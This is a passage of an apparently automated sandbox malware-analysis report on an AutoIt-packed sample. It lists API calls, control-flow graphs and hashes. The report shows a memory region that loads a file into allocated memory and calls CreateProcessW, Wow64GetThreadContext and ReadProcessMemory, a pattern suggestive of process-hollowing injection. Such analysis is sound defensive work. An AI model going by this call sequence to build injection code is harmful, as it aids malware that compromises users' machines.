                                                                      • Part of subcall function 00623F53: RegisterClassExW.USER32(00000030), ref: 00623FB0
                                                                      • Part of subcall function 00623F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00623FC1
                                                                      • Part of subcall function 00623F53: InitCommonControlsEx.COMCTL32(?), ref: 00623FDE
                                                                      • Part of subcall function 00623F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00623FEE
                                                                      • Part of subcall function 00623F53: LoadIconW.USER32(000000A9), ref: 00624004
                                                                      • Part of subcall function 00623F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00624013
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: d5de10cfc0bb60d83ec94ae526b502ac7750418d17bedd9aecd18844a68680de
                                                                    • Instruction ID: 3dc5580d1f1efe5f9dd0d7bd1af7b7ccb3112cbed3f0e5c56ff18627b522a420
                                                                    • Opcode Fuzzy Hash: d5de10cfc0bb60d83ec94ae526b502ac7750418d17bedd9aecd18844a68680de
                                                                    • Instruction Fuzzy Hash: EA2151B0E00354ABCB04DFA9EC85A99BFF7EB49310F00511AE205AE3A0D77556449F91

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1234 64acb3-64ace0 call 646ac0 call 647cf4 call 646986 1241 64ace2-64acf8 call 64e880 1234->1241 1242 64acfd-64ad02 1234->1242 1248 64af52-64af57 call 646b05 1241->1248 1244 64ad08-64ad0f 1242->1244 1246 64ad11-64ad40 1244->1246 1247 64ad42-64ad51 GetStartupInfoW 1244->1247 1246->1244 1249 64ad57-64ad5c 1247->1249 1250 64ae80-64ae86 1247->1250 1249->1250 1254 64ad62-64ad79 1249->1254 1251 64af44-64af50 call 64af58 1250->1251 1252 64ae8c-64ae9d 1250->1252 1251->1248 1257 64aeb2-64aeb8 1252->1257 1258 64ae9f-64aea2 1252->1258 1255 64ad80-64ad83 1254->1255 1256 64ad7b-64ad7d 1254->1256 1261 64ad86-64ad8c 1255->1261 1256->1255 1263 64aebf-64aec6 1257->1263 1264 64aeba-64aebd 1257->1264 1258->1257 1262 64aea4-64aead 1258->1262 1266 64adae-64adb6 1261->1266 1267 64ad8e-64ad9f call 646986 1261->1267 1268 64af3e-64af3f 1262->1268 1269 64aec9-64aed5 GetStdHandle 1263->1269 1264->1269 1271 64adb9-64adbb 1266->1271 1278 64ada5-64adab 1267->1278 1279 64ae33-64ae3a 1267->1279 1268->1250 1272 64aed7-64aed9 1269->1272 1273 64af1c-64af32 1269->1273 1271->1250 1276 64adc1-64adc6 1271->1276 1272->1273 1277 64aedb-64aee4 GetFileType 1272->1277 1273->1268 1275 64af34-64af37 1273->1275 1275->1268 1280 64ae20-64ae31 1276->1280 1281 64adc8-64adcb 1276->1281 1277->1273 1282 64aee6-64aef0 1277->1282 1278->1266 1285 64ae40-64ae4e 1279->1285 1280->1271 1281->1280 1286 64adcd-64add1 1281->1286 1283 64aef2-64aef8 1282->1283 1284 64aefa-64aefd 1282->1284 1287 64af05 1283->1287 1288 64aeff-64af03 1284->1288 1289 64af08-64af1a InitializeCriticalSectionAndSpinCount 1284->1289 1290 64ae74-64ae7b 1285->1290 1291 64ae50-64ae72 1285->1291 1286->1280 1292 64add3-64add5 1286->1292 1287->1289 1288->1287 1289->1268 1290->1261 1291->1285 1293 64ade5-64ae1a InitializeCriticalSectionAndSpinCount 1292->1293 1294 64add7-64ade3 GetFileType 1292->1294 1295 64ae1d 1293->1295 1294->1293 1294->1295 1295->1280
                                                                    APIs
                                                                    • __lock.LIBCMT ref: 0064ACC1
                                                                      • Part of subcall function 00647CF4: __mtinitlocknum.LIBCMT ref: 00647D06
                                                                      • Part of subcall function 00647CF4: EnterCriticalSection.KERNEL32(00000000,?,00647ADD,0000000D), ref: 00647D1F
                                                                    • __calloc_crt.LIBCMT ref: 0064ACD2
                                                                      • Part of subcall function 00646986: __calloc_impl.LIBCMT ref: 00646995
                                                                      • Part of subcall function 00646986: Sleep.KERNEL32(00000000,000003BC,0063F507,?,0000000E), ref: 006469AC
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0064ACED
                                                                    • GetStartupInfoW.KERNEL32(?,006D6E28,00000064,00645E91,006D6C70,00000014), ref: 0064AD46
                                                                    • __calloc_crt.LIBCMT ref: 0064AD91
                                                                    • GetFileType.KERNEL32(00000001), ref: 0064ADD8
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0064AE11
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 1426640281-0
                                                                    • Opcode ID: ac94acdc9d604f403746cbbccc2335b8481db03c79d6e27d25e7bd15aa08c664
                                                                    • Instruction ID: 9b33dda174c4cc1f88a1e1582a0bd27abe15488637bf6f9c207334308cdea84d
                                                                    • Opcode Fuzzy Hash: ac94acdc9d604f403746cbbccc2335b8481db03c79d6e27d25e7bd15aa08c664
                                                                    • Instruction Fuzzy Hash: C781F771D45341AFDB14CFA8C8805ADBBF2AF06324B24525DE4B6AB3D1C7349843DB56

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1296 14def90-14df03e call 14dc980 1299 14df045-14df06b call 14dfea0 CreateFileW 1296->1299 1302 14df06d 1299->1302 1303 14df072-14df082 1299->1303 1304 14df1bd-14df1c1 1302->1304 1311 14df089-14df0a3 VirtualAlloc 1303->1311 1312 14df084 1303->1312 1305 14df203-14df206 1304->1305 1306 14df1c3-14df1c7 1304->1306 1308 14df209-14df210 1305->1308 1309 14df1c9-14df1cc 1306->1309 1310 14df1d3-14df1d7 1306->1310 1315 14df265-14df27a 1308->1315 1316 14df212-14df21d 1308->1316 1309->1310 1317 14df1d9-14df1e3 1310->1317 1318 14df1e7-14df1eb 1310->1318 1313 14df0aa-14df0c1 ReadFile 1311->1313 1314 14df0a5 1311->1314 1312->1304 1319 14df0c8-14df108 VirtualAlloc 1313->1319 1320 14df0c3 1313->1320 1314->1304 1323 14df27c-14df287 VirtualFree 1315->1323 1324 14df28a-14df292 1315->1324 1321 14df21f 1316->1321 1322 14df221-14df22d 1316->1322 1317->1318 1325 14df1ed-14df1f7 1318->1325 1326 14df1fb 1318->1326 1327 14df10f-14df12a call 14e00f0 1319->1327 1328 14df10a 1319->1328 1320->1304 1321->1315 1329 14df22f-14df23f 1322->1329 1330 14df241-14df24d 1322->1330 1323->1324 1325->1326 1326->1305 1336 14df135-14df13f 1327->1336 1328->1304 1332 14df263 1329->1332 1333 14df24f-14df258 1330->1333 1334 14df25a-14df260 1330->1334 1332->1308 1333->1332 1334->1332 1337 14df141-14df170 call 14e00f0 1336->1337 1338 14df172-14df186 call 14dff00 1336->1338 1337->1336 1343 14df188 1338->1343 1344 14df18a-14df18e 1338->1344 1343->1304 1346 14df19a-14df19e 1344->1346 1347 14df190-14df194 CloseHandle 1344->1347 1348 14df1ae-14df1b7 1346->1348 1349 14df1a0-14df1ab VirtualFree 1346->1349 1347->1346 1348->1299 1348->1304 1349->1348
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014DF061
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014DF287
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063884765.00000000014DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DC000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_14dc000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                    • Instruction ID: f861ec523099c0586f39dccc5eab9b119a37feaaa3378875bb157f5323f61c2d
                                                                    • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                    • Instruction Fuzzy Hash: C9A10974E00209EBDF24CFA4C8A4BEEBBB5BF48304F10815AE512BB291D7755A46CF54

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1405 6249fb-624a25 call 62bcce RegOpenKeyExW 1408 6941cc-6941e3 RegQueryValueExW 1405->1408 1409 624a2b-624a2f 1405->1409 1410 6941e5-694222 call 63f4ea call 6247b7 RegQueryValueExW 1408->1410 1411 694246-69424f RegCloseKey 1408->1411 1416 69423d-694245 call 6247e2 1410->1416 1417 694224-69423b call 626a63 1410->1417 1416->1411 1417->1416
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00624A1D
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006941DB
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0069421A
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00694249
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseOpen
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                    • API String ID: 1586453840-614718249
                                                                    • Opcode ID: 56b246316a67a96a307c31b61226fd32905aaae25224f02ab05d660a8dd68158
                                                                    • Instruction ID: 4e01f4b93e76ab042bde3647956fa6ef9581cfb111574ef97f021bf058bf5cac
                                                                    • Opcode Fuzzy Hash: 56b246316a67a96a307c31b61226fd32905aaae25224f02ab05d660a8dd68158
                                                                    • Instruction Fuzzy Hash: 9C116DB5A00118BEEB00EBA4DD86DFF7BADEF05344F001069B502D7191EF70AE429B50

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1432 6236b8-623728 CreateWindowExW * 2 ShowWindow * 2
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006236E6
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00623707
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00623AA3,?), ref: 0062371B
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00623AA3,?), ref: 00623724
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: 5569c738904f5e58a6ea76a7521f2e66f33eaf0dffb32806c604c1ce891b8bc7
                                                                    • Instruction ID: 0cce349fa07d7b5171a83de5cf75186412ed9fe3f60bcbfd26e21f04646e35b3
                                                                    • Opcode Fuzzy Hash: 5569c738904f5e58a6ea76a7521f2e66f33eaf0dffb32806c604c1ce891b8bc7
                                                                    • Instruction Fuzzy Hash: B4F03A705403D07AEB309B57AC88E672E7FD7C7F60B00101ABA04AE1A0C97118C1EAB0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1537 14ded30-14dee91 call 14dc980 call 14dec20 CreateFileW 1544 14dee98-14deea8 1537->1544 1545 14dee93 1537->1545 1548 14deeaf-14deec9 VirtualAlloc 1544->1548 1549 14deeaa 1544->1549 1546 14def48-14def4d 1545->1546 1550 14deecd-14deee4 ReadFile 1548->1550 1551 14deecb 1548->1551 1549->1546 1552 14deee8-14def22 call 14dec60 call 14ddc20 1550->1552 1553 14deee6 1550->1553 1551->1546 1558 14def3e-14def46 ExitProcess 1552->1558 1559 14def24-14def39 call 14decb0 1552->1559 1553->1546 1558->1546 1559->1558
                                                                    APIs
                                                                      • Part of subcall function 014DEC20: Sleep.KERNELBASE(000001F4), ref: 014DEC31
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014DEE87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063884765.00000000014DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DC000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_14dc000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: 3Z459FPKQGUZ3VWR7RGY6PZ6W
                                                                    • API String ID: 2694422964-500208108
                                                                    • Opcode ID: 78d6c4b8049ca2874e8db4ed85617a23264e3260141cc651ce32c9f66941d735
                                                                    • Instruction ID: 1cfeb38e96df20a113ab5788ab632c8dc10144278e5181fabde14fd1fe202224
                                                                    • Opcode Fuzzy Hash: 78d6c4b8049ca2874e8db4ed85617a23264e3260141cc651ce32c9f66941d735
                                                                    • Instruction Fuzzy Hash: 4A619330D04288DAEF11DBB4D858BEFBB75AF15304F044599E148BB2C1D7BA1B45CB66
                                                                    APIs
                                                                      • Part of subcall function 00625374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006E1148,?,006261FF,?,00000000,00000001,00000000), ref: 00625392
                                                                      • Part of subcall function 006249FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00624A1D
                                                                    • _wcscat.LIBCMT ref: 00692D80
                                                                    • _wcscat.LIBCMT ref: 00692DB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$FileModuleNameOpen
                                                                    • String ID: 8!n$\$\Include\
                                                                    • API String ID: 3592542968-2639341556
                                                                    • Opcode ID: f159b9272170ecaf2b7b8e770d325436609c2d235b54c7a5e21883060efe5f76
                                                                    • Instruction ID: cc667b0e4712e3af8e51ed30daf9f57c3886cadf29149e40b058413aa969f9f1
                                                                    • Opcode Fuzzy Hash: f159b9272170ecaf2b7b8e770d325436609c2d235b54c7a5e21883060efe5f76
                                                                    • Instruction Fuzzy Hash: 68518FB14043929BC744EF59E8E18DAB7FFBE59300B40552EF7458B260EB709A48CF56
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0062522F
                                                                    • _wcscpy.LIBCMT ref: 00625283
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00625293
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00693CB0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                    • String ID: Line:
                                                                    • API String ID: 1053898822-1585850449
                                                                    • Opcode ID: f99e2ebb4d12126f0991527e089282b3242e7691ae774448f51a2dffdae0a4f0
                                                                    • Instruction ID: 1718f74159ad80f1506f2a33ce622f91aff7dd8b164b786c729996e06e75d8dc
                                                                    • Opcode Fuzzy Hash: f99e2ebb4d12126f0991527e089282b3242e7691ae774448f51a2dffdae0a4f0
                                                                    • Instruction Fuzzy Hash: 6131D071408BA0AED370EB60EC46FDE77DAAF45310F00451EF5868A191DB70A658CF9B
                                                                    APIs
                                                                      • Part of subcall function 006241A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006239FE,?,00000001), ref: 006241DB
                                                                    • _free.LIBCMT ref: 006936B7
                                                                    • _free.LIBCMT ref: 006936FE
                                                                      • Part of subcall function 0062C833: __wsplitpath.LIBCMT ref: 0062C93E
                                                                      • Part of subcall function 0062C833: _wcscpy.LIBCMT ref: 0062C953
                                                                      • Part of subcall function 0062C833: _wcscat.LIBCMT ref: 0062C968
                                                                      • Part of subcall function 0062C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0062C978
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                    • API String ID: 805182592-1757145024
                                                                    • Opcode ID: 1b7a7b8e8e795fb467dac07eda8750d6c250efbf3b0f7ee0575d319c20b5b058
                                                                    • Instruction ID: b07e8caa03eb47d678206c55887e399c9fb0f07f178cdba6f7a651c15c98f5ea
                                                                    • Opcode Fuzzy Hash: 1b7a7b8e8e795fb467dac07eda8750d6c250efbf3b0f7ee0575d319c20b5b058
                                                                    • Instruction Fuzzy Hash: 7E914B71910229AFCF44EFA4DC919EEB7BABF18310F104429F816AB391DB349A55CF94
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00693725
                                                                    • GetOpenFileNameW.COMDLG32 ref: 0069376F
                                                                      • Part of subcall function 0062660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006253B1,?,?,006261FF,?,00000000,00000001,00000000), ref: 0062662F
                                                                      • Part of subcall function 006240A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006240C6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                    • String ID: X$t3m
                                                                    • API String ID: 3777226403-1971450663
                                                                    • Opcode ID: a96dfc765ecd2f7bd5ddc8ede54d7202b402486738f34b076964d3ec45fbe86c
                                                                    • Instruction ID: 2fdd731565e8b084daec37561161a2af010123804d1b80cd3e19112e1a3d7ec6
                                                                    • Opcode Fuzzy Hash: a96dfc765ecd2f7bd5ddc8ede54d7202b402486738f34b076964d3ec45fbe86c
                                                                    • Instruction Fuzzy Hash: B621A171E006A89BCF419F98D8457EE7BFA9F49300F00401AE505AB341DFB45A898F6A
                                                                    APIs
                                                                    • __getstream.LIBCMT ref: 006434FE
                                                                      • Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 00643539
                                                                    • __wopenfile.LIBCMT ref: 00643549
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                    • String ID: <G
                                                                    • API String ID: 1820251861-2138716496
                                                                    • Opcode ID: 57813e7936015757f194dae2e34719a31bbba09b37cbc22c587d2f8367a10684
                                                                    • Instruction ID: 66b4c7eb566fdb1082acd7e432ae375defe3ac2adab6fc4b1a237be0bc1ae878
                                                                    • Opcode Fuzzy Hash: 57813e7936015757f194dae2e34719a31bbba09b37cbc22c587d2f8367a10684
                                                                    • Instruction Fuzzy Hash: E2112970A00326DFDB92BFB48C426AE36E7AF06350B158429F815CB3C1EB30CA1197B1
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0063D28B,SwapMouseButtons,00000004,?), ref: 0063D2BC
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0063D28B,SwapMouseButtons,00000004,?,?,?,?,0063C865), ref: 0063D2DD
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,0063D28B,SwapMouseButtons,00000004,?,?,?,?,0063C865), ref: 0063D2FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    • Opcode ID: fcc1bd5d16d85411a9de481a03db6dd78d5be90b711cf6b57482024a00f38052
                                                                    • Instruction ID: 0b2c5d8a930eebaa5118379d695cd7a346184951b3e84ca88ddcda8907f50cd2
                                                                    • Opcode Fuzzy Hash: fcc1bd5d16d85411a9de481a03db6dd78d5be90b711cf6b57482024a00f38052
                                                                    • Instruction Fuzzy Hash: 71113975611208BFEB209FA4EC84EEF7BBDEF46744F104469F906D7210E631AE419BA0
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 014DE44D
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014DE471
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014DE493
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063884765.00000000014DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DC000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_14dc000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                    • Instruction ID: 2b404c6ab0f2729dc71fbd4d8422721657875fcc5533563dd9216b77424c4943
                                                                    • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                    • Instruction Fuzzy Hash: 9262FC30A14658DBEB24CFA4C850BDEB776EF58700F1091A9D20DEB3A0E7759E81CB59
                                                                    APIs
                                                                    Memory Dump Source
